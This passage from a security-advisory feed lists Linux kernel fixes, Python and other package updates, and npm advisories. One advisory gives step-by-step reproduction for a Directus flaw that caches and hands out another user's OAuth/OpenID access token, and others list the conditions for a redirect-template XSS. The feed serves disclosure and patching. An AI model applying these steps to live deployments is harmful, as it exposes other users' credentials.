Dumazet) - SUNRPC: Fix RPC client cleaned up the freed pipefs dentries (felix) - libceph: fix race between delayed_work() and ceph_monc_stop() (Ilya Dryomov) - ALSA: hda/realtek: Limit mic boost on VAIO PRO PX (Edson Juliano Drosdeck) - nvmem: meson-efuse: Fix return value of nvmem callbacks (Joy Chakraborty) - hpet: Support 32-bit userspace (He Zhe) - USB: core: Fix duplicate endpoint bug by clearing reserved bits in the descriptor (Alan Stern) - usb: gadget: configfs: Prevent OOB read/write in usb_string_copy() (Lee Jones) - USB: Add USB_QUIRK_NO_SET_INTF quirk for START BP-850k (WangYuli) - USB: serial: option: add Rolling RW350-GL variants (Vanillan Wang) - USB: serial: option: add Netprisma LCUK54 series modules (Mank Wang) - USB: serial: option: add support for Foxconn T99W651 (Slark Xiao) - USB: serial: option: add Fibocom FM350-GL (Bjorn Mork) - USB: serial: option: add Telit FN912 rmnet compositions (Daniele Palmas) - USB: serial: option: add Telit generic core-dump composition (Daniele Palmas) - ARM: davinci: Convert comma to semicolon (Chen Ni) - s390: Mark psw in __load_psw_mask() as __unitialized (Sven Schnelle) - udp: Set SOCK_RCU_FREE earlier in udp_lib_get_port(). (Kuniyuki Iwashima) - ppp: reject claimed-as-LCP but actually malformed packets (Dmitry Antipov) - net: ethernet: lantiq_etop: fix double free in detach (Aleksander Jan Bajkowski) - net: lantiq_etop: add blank line after declaration (Aleksander Jan Bajkowski) - octeontx2-af: Fix incorrect value output on error path in rvu_check_rsrc_availability() (Aleksandr Mishin) - tcp: fix incorrect undo caused by DSACK of TLP retransmit (Neal Cardwell) - tcp: add TCP_INFO status for failed client TFO (Jason Baron) - vfs: don't mod negative dentry count when on shrinker list (Brian Foster) - fs/dcache: Re-use value stored to dentry->d_flags instead of re-reading (linke li) - filelock: fix potential use-after-free in posix_lock_inode (Jeff Layton) - nilfs2: fix incorrect inode allocation from reserved inodes (Ryusuke Konishi) - nvme-multipath: find NUMA path only for online numa-node (Nilay Shroff) - ALSA: hda/realtek: Enable headset mic of JP-IK LEAP W502 with ALC897 (Jian-Hong Pan) - i2c: pnx: Fix potential deadlock warning from del_timer_sync() call in isr (Piotr Wojtaszczyk) - media: dw2102: fix a potential buffer overflow (Mauro Carvalho Chehab) - bnx2x: Fix multiple UBSAN array-index-out-of-bounds (Ghadi Elie Rahme) - drm/amdgpu/atomfirmware: silence UBSAN warning (Alex Deucher) - drm/nouveau: fix null pointer dereference in nouveau_connector_get_modes (Ma Ke) - Revert 'mm/writeback: fix possible divide-by-zero in wb_dirty_limits(), again' (Jan Kara) - fsnotify: Do not generate events for O_PATH file descriptors (Jan Kara) - can: kvaser_usb: Explicitly initialize family in leafimx driver_info struct (Jimmy Assarsson) - mm: optimize the redundant loop of mm_update_owner_next() (Jinliang Zheng) - nilfs2: add missing check for inode numbers on directory entries (Ryusuke Konishi) - nilfs2: fix inode number range checks (Ryusuke Konishi) - inet_diag: Initialize pad field in struct inet_diag_req_v2 (Shigeru Yoshida) - selftests: make order checking verbose in msg_zerocopy selftest (Zijian Zhang) - selftests: fix OOM in msg_zerocopy selftest (Zijian Zhang) - bonding: Fix out-of-bounds read in bond_option_arp_ip_targets_set() (Sam Sun) - tcp_metrics: validate source addr length (Jakub Kicinski) - UPSTREAM: tcp: fix DSACK undo in fast recovery to call tcp_try_to_open() (Neal Cardwell) - net: tcp better handling of reordering then loss cases (Yuchung Cheng) - tcp: add ece_ack flag to reno sack functions (Yousuk Seung) - tcp: tcp_mark_head_lost is only valid for sack-tcp (zhang kai) - s390/pkey: Wipe sensitive data on failure (Holger Dengler) - jffs2: Fix potential illegal address access in jffs2_free_inode (Wang Yong) - powerpc/xmon: Check cpu id in commands 'c#', 'dp#' and 'dx#' (Greg Kurz) - orangefs: fix out-of-bounds fsid access (Mike Marshall) - powerpc/64: Set _IO_BASE to POISON_POINTER_DELTA not 0 for CONFIG_PCI=n (Michael Ellerman) - i2c: i801: Annotate apanel_addr as __ro_after_init (Heiner Kallweit) - media: dvb-frontends: tda10048: Fix integer overflow (Ricardo Ribalda) - media: s2255: Use refcount_t instead of atomic_t for num_channels (Ricardo Ribalda) - media: dvb-frontends: tda18271c2dd: Remove casting during div (Ricardo Ribalda) - net: dsa: mv88e6xxx: Correct check for empty list (Simon Horman) - Input: ff-core - prefer struct_size over open coded arithmetic (Erick Archer) - firmware: dmi: Stop decoding on broken entry (Jean Delvare) - sctp: prefer struct_size over open coded arithmetic (Erick Archer) - media: dw2102: Don't translate i2c read into write (Michael Bunk) - drm/amd/display: Skip finding free audio for unknown engine_id (Alex Hung) - drm/amdgpu: Initialize timestamp for some legacy SOCs (Ma Jun) - scsi: qedf: Make qedf_execute_tmf() non-preemptible (John Meneghini) - IB/core: Implement a limit on UMAD receive List (Michael Guralnik) - media: dvb-usb: dib0700_devices: Add missing release_firmware() (Ricardo Ribalda) - media: dvb: as102-fe: Fix as10x_register_addr packing (Ricardo Ribalda) - drm/lima: fix shared irq handling on driver remove (Erico Nunes) - LTS tag: v5.4.279 (Alok Tiwari) - arm64: dts: rockchip: Add sound-dai-cells for RK3368 (Alex Bee) - ARM: dts: rockchip: rk3066a: add #sound-dai-cells to hdmi node (Johan Jonker) - tcp: Fix data races around icsk->icsk_af_ops. (Kuniyuki Iwashima) - ipv6: Fix data races around sk->sk_prot. (Kuniyuki Iwashima) - ipv6: annotate some data-races around sk->sk_prot (Eric Dumazet) - nfs: Leave pages in the pagecache if readpage failed (Matthew Wilcox (Oracle)) - pwm: stm32: Refuse too small period requests (Uwe Kleine-Konig) - mtd: spinand: macronix: Add support for serial NAND flash (Jaime Liao) - ftruncate: pass a signed offset (Arnd Bergmann) - ata: libata-core: Fix double free on error (Niklas Cassel) - batman-adv: Don't accept TT entries for out-of-spec VIDs (Sven Eckelmann) - drm/nouveau/dispnv04: fix null pointer dereference in nv17_tv_get_hd_modes (Ma Ke) - drm/nouveau/dispnv04: fix null pointer dereference in nv17_tv_get_ld_modes (Ma Ke) - hexagon: fix fadvise64_64 calling conventions (Arnd Bergmann) - csky, hexagon: fix broken sys_sync_file_range (Arnd Bergmann) - net: can: j1939: enhanced error handling for tightly received RTS messages in xtp_rx_rts_session_new (Oleksij Rempel) - net: can: j1939: recover socket queue on CAN bus error during BAM transmission (Oleksij Rempel) - net: can: j1939: Initialize unused data in j1939_send_one() (Shigeru Yoshida) - tty: mcf: MCF54418 has 10 UARTS (Jean-Michel Hautbois) - usb: atm: cxacru: fix endpoint checking in cxacru_bind() (Nikita Zhandarovich) - usb: musb: da8xx: fix a resource leak in probe() (Dan Carpenter) - usb: gadget: printer: SS+ support (Oliver Neukum) - net: usb: ax88179_178a: improve link status logs (Jose Ignacio Tornos Martinez) - iio: chemical: bme680: Fix sensor data read operation (Vasileios Amoiridis) - iio: chemical: bme680: Fix overflows in compensate() functions (Vasileios Amoiridis) - iio: chemical: bme680: Fix calibration data variable (Vasileios Amoiridis) - iio: chemical: bme680: Fix pressure value output (Vasileios Amoiridis) - iio: adc: ad7266: Fix variable checking bug (Fernando Yang) - mmc: sdhci: Do not lock spinlock around mmc_gpio_get_ro() (Adrian Hunter) - mmc: sdhci: Do not invert write-protect twice (Adrian Hunter) - mmc: sdhci-pci: Convert PCIBIOS_* return codes to errnos (Ilpo Jarvinen) - x86: stop playing stack games in profile_pc() (Linus Torvalds) - gpio: davinci: Validate the obtained number of IRQs (Aleksandr Mishin) - nvme: fixup comment for nvme RDMA Provider Type (Hannes Reinecke) - soc: ti: wkup_m3_ipc: Send NULL dummy message instead of pointer message (Andrew Davis) - media: dvbdev: Initialize sbuf (Ricardo Ribalda) - ALSA: emux: improve patch ioctl data validation (Oswald Buddenhagen) - net/dpaa2: Avoid explicit cpumask var allocation on stack (Dawei Li) - net/iucv: Avoid explicit cpumask var allocation on stack (Dawei Li) - mtd: partitions: redboot: Added conversion of operands to a larger type (Denis Arefev) - drm/panel: ilitek-ili9881c: Fix warning with GPIO controllers that sleep (Laurent Pinchart) - netfilter: nf_tables: fully validate NFT_DATA_VALUE on store to data registers (Pablo Neira Ayuso) - parisc: use correct compat recv/recvfrom syscalls (Arnd Bergmann) - sparc: fix old compat_sys_select() (Arnd Bergmann) - net: phy: micrel: add Microchip KSZ 9477 to the device table (Enguerrand de Ribaucourt) - net: phy: mchp: Add support for LAN8814 QUAD PHY (Divya Koppera) - net: dsa: microchip: fix initial port flush problem (Tristram Ha) - ASoC: fsl-asoc-card: set priv->pdev before using it (Elinor Montmasson) - netfilter: nf_tables: validate family when identifying table via handle (Pablo Neira Ayuso) - drm/amdgpu: fix UBSAN warning in kv_dpm.c (Alex Deucher) - pinctrl: rockchip: fix pinmux reset in rockchip_pmx_set (Huang-Huang Bao) - pinctrl: rockchip: fix pinmux bits for RK3328 GPIO3-B pins (Huang-Huang Bao) - pinctrl: rockchip: fix pinmux bits for RK3328 GPIO2-B pins (Huang-Huang Bao) - pinctrl: fix deadlock in create_pinctrl() when handling -EPROBE_DEFER (Hagar Hemdan) - iio: dac: ad5592r: fix temperature channel scaling value (Marc Ferland) - iio: dac: ad5592r: un-indent code-block for scale read (Alexandru Ardelean) - iio: dac: ad5592r-base: Replace indio_dev->mlock with own device lock (Sergiu Cuciurean) - x86/amd_nb: Check for invalid SMN reads (Yazen Ghannam) - PCI: Add PCI_ERROR_RESPONSE and related definitions (Naveen Naidu) - perf/core: Fix missing wakeup when waiting for context reference (Haifeng Xu) - tracing: Add MODULE_DESCRIPTION() to preemptirq_delay_test (Jeff Johnson) - arm64: dts: qcom: qcs404: fix bluetooth device address (Johan Hovold) - ARM: dts: samsung: smdk4412: fix keypad no-autorepeat (Krzysztof Kozlowski) - ARM: dts: samsung: exynos4412-origen: fix keypad no-autorepeat (Krzysztof Kozlowski) - ARM: dts: samsung: smdkv310: fix keypad no-autorepeat (Krzysztof Kozlowski) - i2c: ocores: set IACK bit after core is enabled (Grygorii Tertychnyi) - gcov: add support for GCC 14 (Peter Oberparleiter) - drm/radeon: fix UBSAN warning in kv_dpm.c (Alex Deucher) - ACPICA: Revert 'ACPICA: avoid Info: mapping multiple BARs. Your kernel is fine.' (Raju Rangoju) - dmaengine: ioatdma: Fix missing kmem_cache_destroy() (Nikita Shubin) - regulator: core: Fix modpost error 'regulator_get_regmap' undefined (Biju Das) - net: usb: rtl8150 fix unintiatilzed variables in rtl8150_get_link_ksettings (Oliver Neukum) - netfilter: ipset: Fix suspicious rcu_dereference_protected() (Jozsef Kadlecsik) - virtio_net: checksum offloading handling fix (Heng Qi) - net/sched: act_api: fix possible infinite loop in tcf_idr_check_alloc() (David Ruth) - net/sched: act_api: rely on rcu in tcf_idr_check_alloc (Pedro Tammela) - netns: Make get_net_ns() handle zero refcount net (Yue Haibing) - xfrm6: check ip6_dst_idev() return value in xfrm6_get_saddr() (Eric Dumazet) - ipv6: prevent possible NULL dereference in rt6_probe() (Eric Dumazet) - ipv6: prevent possible NULL deref in fib6_nh_init() (Eric Dumazet) - netrom: Fix a memory leak in nr_heartbeat_expiry() (Gavrilov Ilia) - cipso: fix total option length computation (Ondrej Mosnacek) - mips: bmips: BCM6358: make sure CBR is correctly set (Christian Marangi) - MIPS: Routerboard 532: Fix vendor retry check code (Ilpo Jarvinen) - PCI/PM: Avoid D3cold for HP Pavilion 17 PC/1972 PCIe Ports (Mario Limonciello) - udf: udftime: prevent overflow in udf_disk_stamp_to_time() (Roman Smirnov) - usb: misc: uss720: check for incompatible versions of the Belkin F5U002 (Alex Henrie) - powerpc/io: Avoid clang null pointer arithmetic warnings (Michael Ellerman) - powerpc/pseries: Enforce hcall result buffer validity and size (Nathan Lynch) - Bluetooth: ath3k: Fix multiple issues reported by checkpatch.pl (Uri Arev) - scsi: qedi: Fix crash while reading debugfs attribute (Manish Rangankar) - drop_monitor: replace spin_lock by raw_spin_lock (Wander Lairson Costa) - batman-adv: bypass empty buckets in batadv_purge_orig_ref() (Eric Dumazet) - selftests/bpf: Prevent client connect before server bind in test_tc_tunnel.sh (Alessandro Carminati (Red Hat)) - rcutorture: Fix rcu_torture_one_read() pipe_count overflow comment (Paul E. McKenney) - i2c: at91: Fix the functionality flags of the slave-only interface (Jean Delvare) - usb-storage: alauda: Check whether the media is initialized (Shichao Lai) - greybus: Fix use-after-free bug in gb_interface_release due to race condition. (Sicong Huang) - netfilter: nftables: exthdr: fix 4-byte stack OOB write (Florian Westphal) - hugetlb_encode.h: fix undefined behaviour (34 << 26) (Matthias Goergens) - tick/nohz_full: Don't abuse smp_call_function_single() in tick_setup_device() (Oleg Nesterov) - nilfs2: fix potential kernel bug due to lack of writeback flag waiting (Ryusuke Konishi) - intel_th: pci: Add Lunar Lake support (Alexander Shishkin) - intel_th: pci: Add Meteor Lake-S support (Alexander Shishkin) - intel_th: pci: Add Sapphire Rapids SOC support (Alexander Shishkin) - intel_th: pci: Add Granite Rapids SOC support (Alexander Shishkin) - intel_th: pci: Add Granite Rapids support (Alexander Shishkin) - dmaengine: axi-dmac: fix possible race in remove() (Nuno Sa) - PCI: rockchip-ep: Remove wrong mask on subsys_vendor_id (Rick Wertenbroek) - ocfs2: fix races between hole punching and AIO+DIO (Su Yue) - ocfs2: use coarse time for new created files (Su Yue) - fs/proc: fix softlockup in __read_vmcore (Rik van Riel) - vmci: prevent speculation leaks by sanitizing event in event_deliver() (Hagar Gamal Halim Hemdan) - tracing/selftests: Fix kprobe event name test for .isra. functions (Steven Rostedt (Google)) - drm/exynos/vidi: fix memory leak in .get_modes() (Jani Nikula) - drivers: core: synchronize really_probe() and dev_uevent() (Dirk Behme) - ionic: fix use after netif_napi_del() (Taehee Yoo) - net/ipv6: Fix the RT cache flush via sysctl using a previous delay (Petr Pavlu) - net/mlx5e: Fix features validation check for tunneled UDP (non-VXLAN) packets (Gal Pressman) - tcp: fix race in tcp_v6_syn_recv_sock() (Eric Dumazet) - drm/bridge/panel: Fix runtime warning on panel bridge release (Adam Miotk) - drm/komeda: check for error-valued pointer (Amjad Ouled-Ameur) - liquidio: Adjust a NULL pointer handling path in lio_vf_rep_copy_packet (Aleksandr Mishin) - HID: logitech-dj: Fix memory leak in logi_dj_recv_switch_to_dj_mode() (Jose Exposito) - iommu: Return right value in iommu_sva_bind_device() (Lu Baolu) - iommu/amd: Fix sysfs leak in iommu init (Kun(llfl)) - HID: core: remove unnecessary WARN_ON() in implement() (Nikita Zhandarovich) - gpio: tqmx86: fix typo in Kconfig label (Gregor Herburger) - SUNRPC: return proper error from gss_wrap_req_priv (Chen Hanxiao) - Input: try trimming too long modalias strings (Dmitry Torokhov) - scsi: mpt3sas: Avoid test/set_bit() operating in non-allocated memory (Breno Leitao) - xhci: Apply broken streams quirk to Etron EJ188 xHCI host (Kuangyi Chiang) - xhci: Apply reset resume quirk to Etron EJ188 xHCI host (Kuangyi Chiang) - xhci: Set correct transferred length for cancelled bulk transfers (Mathias Nyman) - jfs: xattr: fix buffer overflow for invalid xattr (Greg Kroah-Hartman) - mei: me: release irq in mei_me_pci_resume error path (Tomas Winkler) - USB: class: cdc-wdm: Fix CPU lockup caused by excessive log messages (Alan Stern) - nilfs2: fix nilfs_empty_dir() misjudgment and long loop on I/O errors (Ryusuke Konishi) - nilfs2: return the mapped address from nilfs_get_page() (Matthew Wilcox (Oracle)) - nilfs2: Remove check for PageError (Matthew Wilcox (Oracle)) - selftests/mm: compaction_test: fix bogus test success on Aarch64 (Dev Jain) - selftests/mm: conform test to TAP format output (Muhammad Usama Anjum) - selftests/mm: compaction_test: fix incorrect write of zero to nr_hugepages (Dev Jain) - serial: sc16is7xx: fix bug in sc16is7xx_set_baud() when using prescaler (Hugo Villeneuve) - serial: sc16is7xx: replace hardcoded divisor value with BIT() macro (Hugo Villeneuve) - drm/amd/display: Handle Y carry-over in VCP X.Y calculation (George Shen) - ASoC: ti: davinci-mcasp: Fix race condition during probe (Joao Paulo Goncalves) - ASoC: ti: davinci-mcasp: Handle missing required DT properties (Peter Ujfalusi) - ASoC: ti: davinci-mcasp: Simplify the configuration parameter handling (Peter Ujfalusi) - ASoC: ti: davinci-mcasp: Remove legacy dma_request parsing (Peter Ujfalusi) - ASoC: ti: davinci-mcasp: Use platform_get_irq_byname_optional (Peter Ujfalusi) - ASoC: ti: davinci-mcasp: remove always zero of davinci_mcasp_get_dt_params (Zhang Qilong) - ASoC: ti: davinci-mcasp: remove redundant assignment to variable ret (Colin Ian King) - usb: gadget: f_fs: Fix race between aio_cancel() and AIO request complete (Wesley Cheng) - ipv6: fix possible race in __fib6_drop_pcpu_from() (Eric Dumazet) - af_unix: Annotate data-race of sk->sk_shutdown in sk_diag_fill(). (Kuniyuki Iwashima) - af_unix: Use skb_queue_len_lockless() in sk_diag_show_rqlen(). (Kuniyuki Iwashima) - af_unix: Use unix_recvq_full_lockless() in unix_stream_connect(). (Kuniyuki Iwashima) - af_unix: Annotate data-race of net->unx.sysctl_max_dgram_qlen. (Kuniyuki Iwashima) - af_unix: Annotate data-races around sk->sk_state in UNIX_DIAG. (Kuniyuki Iwashima) - af_unix: Annotate data-races around sk->sk_state in sendmsg() and recvmsg(). (Kuniyuki Iwashima) - af_unix: Annotate data-races around sk->sk_state in unix_write_space() and poll(). (Kuniyuki Iwashima) - af_unix: Annotate data-race of sk->sk_state in unix_inq_len(). (Kuniyuki Iwashima) - ptp: Fix error message on failed pin verification (Karol Kolacinski) - net/sched: taprio: always validate TCA_TAPRIO_ATTR_PRIOMAP (Eric Dumazet) - tcp: count CLOSE-WAIT sockets for TCP_MIB_CURRESTAB (Jason Xing) - net: sched: sch_multiq: fix possible OOB write in multiq_tune() (Hangyu Hua) - ipv6: sr: block BH in seg6_output_core() and seg6_input_core() (Eric Dumazet) - wifi: iwlwifi: mvm: don't read past the mfuart notifcation (Emmanuel Grumbach) - wifi: iwlwifi: dbg_ini: move iwl_dbg_tlv_free outside of debugfs ifdef (Shahar S Matityahu) - wifi: iwlwifi: mvm: revert gen2 TX A-MPDU size to 64 (Johannes Berg) - wifi: cfg80211: pmsr: use correct nla_get_uX functions (Lin Ma) - wifi: mac80211: Fix deadlock in ieee80211_sta_ps_deliver_wakeup() (Remi Pommarel) - wifi: mac80211: mesh: Fix leak of mesh_preq_queue objects (Nicolas Escande)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12612
11.09.2024 03:00:00	redhat	[RHSA-2024:6569] 389-ds:1.4 security update (moderate)	389 Directory Server is an LDAP version 3 (LDAPv3) compliant server. The base packages include the Lightweight Directory Access Protocol (LDAP) server and command-line utilities for server administration. Security Fix(es):* 389-ds-base: Malformed userPassword hash may cause Denial of Service (CVE-2024-5953)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6569
11.09.2024 00:39:25	npm	[NPM:GHSA-CFF8-X7JV-4FM8] Session is cached for OpenID and OAuth2 if `redirect` is not used (high)	### SummaryUnauthenticated user can access credentials of last authenticated user via OpenID or OAuth2 where the authentication URL did not include `redirect` query string.For example:- Project is configured with OpenID or OAuth2- Project is configured with cache enabled- User tries to login via SSO link, but without `redirect` query string- After successful login, credentials are cached- If an unauthenticated user tries to login via SSO link, it will return the credentials of the other last userThe SSO link is something like `https://directus.example.com/auth/login/openid/callback`, where `openid` is the name of the OpenID provider configured in Directus### DetailsThis happens because on that endpoint for both OpenId and Oauth2 Directus is using the `respond` middleware, which by default will try to cache GET requests that met some conditions. Although, those conditions do not include this scenario, when an unauthenticated request returns user credentials.For OpenID, this can be seen here:https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459And for OAuth2 can be seen herehttps://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428### PoC- Create a new Directus project- Set `CACHE_ENABLED` to true- Set `CACHE_STORE` to `redis` for reliable results (if using memory with multiple nodes, it may only happen sometimes, due to cache being different for different nodes)- Configure `REDIS` with redis string or redis host, port, user, etc.- Set `AUTH_PROVIDERS` to `openid`- Set `PUBLIC_URL` to the the main URL of your project . For example, `PUBLIC_URL: http://localhost:8055`- Configure `AUTH_OPENID_CLIENT_ID`, `AUTH_OPENID_CLIENT_SECRET`, `AUTH_OPENID_ISSUER_URL` with proper OpenID configurations- Be sure that on OpenID external app you have configured Redirect URI to `http://localhost:8055/auth/login/openid/callback`- Run Directus- Open the SSO link like `http://localhost:8055/auth/login/openid/callback`- Do the authentication on the OpenID external webpage- Verify that it you got redirected to a page with a JSON including `access_token` property- Be sure all anonymous mode windows are closed- Open an anonymous window and go to the SSO Link `http://localhost:8055/auth/login/openid/callback` and see you have the same credentials, even though you don't have any session because you are in anonymous mode### ImpactAll projects using OpenID or OAuth 2, that does not include `redirect` query string on loggin in users.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-CFF8-X7JV-4FM8
10.09.2024 22:42:42	npm	[NPM:GHSA-M6FV-JMCG-4JFG] send vulnerable to template injection that can lead to XSS (moderate)	### Impactpassing untrusted user input - even after sanitizing it - to `SendStream.redirect()` may execute untrusted code### Patchesthis issue is patched in send 0.19.0### Workaroundsusers are encouraged to upgrade to the patched version of express, but otherwise can workaround this issue by making sure any untrusted inputs are safe, ideally by validating them against an explicit allowlist### Detailssuccessful exploitation of this vector requires the following:1. The attacker MUST control the input to response.redirect()1. express MUST NOT redirect before the template appears1. the browser MUST NOT complete redirection before:1. the user MUST click on the link in the template	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M6FV-JMCG-4JFG
10.09.2024 22:42:34	npm	[NPM:GHSA-CM22-4G7W-348P] serve-static vulnerable to template injection that can lead to XSS (moderate)	### Impactpassing untrusted user input - even after sanitizing it - to `redirect()` may execute untrusted code### Patchesthis issue is patched in serve-static 1.16.0### Workaroundsusers are encouraged to upgrade to the patched version of express, but otherwise can workaround this issue by making sure any untrusted inputs are safe, ideally by validating them against an explicit allowlist### Detailssuccessful exploitation of this vector requires the following:1. The attacker MUST control the input to response.redirect()1. express MUST NOT redirect before the template appears1. the browser MUST NOT complete redirection before:1. the user MUST click on the link in the template	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-CM22-4G7W-348P
11.09.2024 12:48:11	almalinux	[ALSA-2024:6529] dovecot security update (moderate)	dovecot security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6529
13.09.2024 04:55:53	fedora	[FEDORA-2024-f7f36c20a2] Fedora 40: python3.11	This is a security release of Python 3.11Note: The release you're looking at is Python 3.11.10, a security bugfix releasefor the legacy 3.11 series. Python 3.12 is now the latest feature release seriesof Python 3.Security content in this releasegh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-113171: Fixed various false positives and false negatives inIPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private,IPv6Address.is_global. Fixes CVE-2024-4032.gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIswith path starting with multiple slashes and no authority. Fixes CVE-2015-2104.gh-121957: Fixed missing audit events around interactive use of Python, now alsoproperly firing for python -i, as well as for python -m asyncio. The event inquestion is cpython.run_stdin.gh-122133: Authenticate the socket connection for the socket.socketpair()fallback on platforms where AF_UNIX is not available like Windows.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs()now correctly lock access to the certificate store, when the ssl.SSLContext isshared across multiple threads.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.gh-121650: email headers with embedded newlines are now quoted on output. Thegenerator will now refuse to serialize (write) headers that are unsafely foldedor delimited; see verify_generated_headers. That's CVE-2024-6923.gh-119690: Fixes data type confusion in audit events raised by_winapi.CreateFile and _winapi.CreateNamedPipe.gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still haspending operation at deallocation, the process may crash.gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at forkis now fixed.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f7f36c20a2
13.09.2024 04:55:49	fedora	[FEDORA-2024-39913e097a] Fedora 40: haproxy	Update to 2.9.10 (CVE-2024-45506)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-39913e097a
13.09.2024 04:54:15	fedora	[FEDORA-2024-b11026f492] Fedora 40: osc	New upstream release 1.9.1, fixes CVE-2024-22034	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b11026f492
13.09.2024 04:36:46	fedora	[FEDORA-2024-18d9a6ba14] Fedora 39: osc	New upstream release 1.9.1, fixes CVE-2024-22034	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-18d9a6ba14
12.09.2024 04:35:02	fedora	[FEDORA-2024-055adf8e6f] Fedora 39: vim	Security fix for CVE-2024-45306patchlevel 703Security fixes for CVE-2024-43374, CVE-2024-43802	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-055adf8e6f
12.09.2024 04:35:01	fedora	[FEDORA-2024-bdac6de5ee] Fedora 39: nextcloud	29.0.6 release RHBZ#2305125 RHBZ#2309499 fixes CVE-2024-39338	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-bdac6de5ee
12.09.2024 04:35:00	fedora	[FEDORA-2024-b73e44fe9d] Fedora 39: wolfssl	RHBZ#2308628 RHBZ#2308629 RHBZ#2308630 RHBZ#2308631 fixed in 5.7.2 release	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b73e44fe9d
12.09.2024 04:28:50	fedora	[FEDORA-2024-02027448d8] Fedora 40: python3.6	Security fix for CVE-2024-6232 (rhbz#2310092)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-02027448d8
12.09.2024 04:28:49	fedora	[FEDORA-2024-f750328c3b] Fedora 40: python3.10	This is a security release of Python 3.10Note: The release you're looking at is Python 3.10.15, a security bugfix releasefor the legacy 3.10 series. Python 3.12 is now the latest feature release seriesof Python 3.Security content in this releasegh-123067: Fix quadratic complexity in parsing "-quoted cookie values withbackslashes by http.cookies. Fixes CVE-2024-7592.gh-113171: Fixed various false positives and false negatives inIPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private,IPv6Address.is_global. Fixes CVE-2024-4032.gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIswith path starting with multiple slashes and no authority. Fixes CVE-2015-2104.gh-121957: Fixed missing audit events around interactive use of Python, now alsoproperly firing for python -i, as well as for python -m asyncio. The event inquestion is cpython.run_stdin.gh-122133: Authenticate the socket connection for the socket.socketpair()fallback on platforms where AF_UNIX is not available like Windows.gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX,and GNU sparse headers. That's CVE-2024-6232.gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs()now correctly lock access to the certificate store, when the ssl.SSLContext isshared across multiple threads.gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return('', '') 2-tuples in more situations where invalid email addresses areencountered instead of potentially inaccurate values. Add optional strictparameter to these two functions: use strict=False to get the old behavior,accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False)can be use to check if the strict paramater is available. This improves theCVE-2023-27043 fix.gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905)without breaking contents using legitimate characters. That's CVE-2024-8088.gh-121650: email headers with embedded newlines are now quoted on output. Thegenerator will now refuse to serialize (write) headers that are unsafely foldedor delimited; see verify_generated_headers. That's CVE-2024-6923.gh-119690: Fixes data type confusion in audit events raised by_winapi.CreateFile and _winapi.CreateNamedPipe.gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still haspending operation at deallocation, the process may crash.gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at forkis now fixed.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f750328c3b
12.09.2024 04:28:47	fedora	[FEDORA-2024-e887a10dee] Fedora 40: python3.13	Python 3.13.0rc2	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e887a10dee
12.09.2024 04:28:44	fedora	[FEDORA-2024-296a0db958] Fedora 40: nextcloud	29.0.6 release RHBZ#2305125 RHBZ#2309499 fixes CVE-2024-39338	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-296a0db958
12.09.2024 04:28:43	fedora	[FEDORA-2024-ed1a50aa61] Fedora 40: wolfssl	RHBZ#2308628 RHBZ#2308629 RHBZ#2308630 RHBZ#2308631 fixed in 5.7.2 release	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ed1a50aa61
11.09.2024 19:23:42	ubuntu	[USN-6997-2] LibTIFF vulnerability (high)	LibTIFF could be made to crash if it received specially crafted input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6997-2
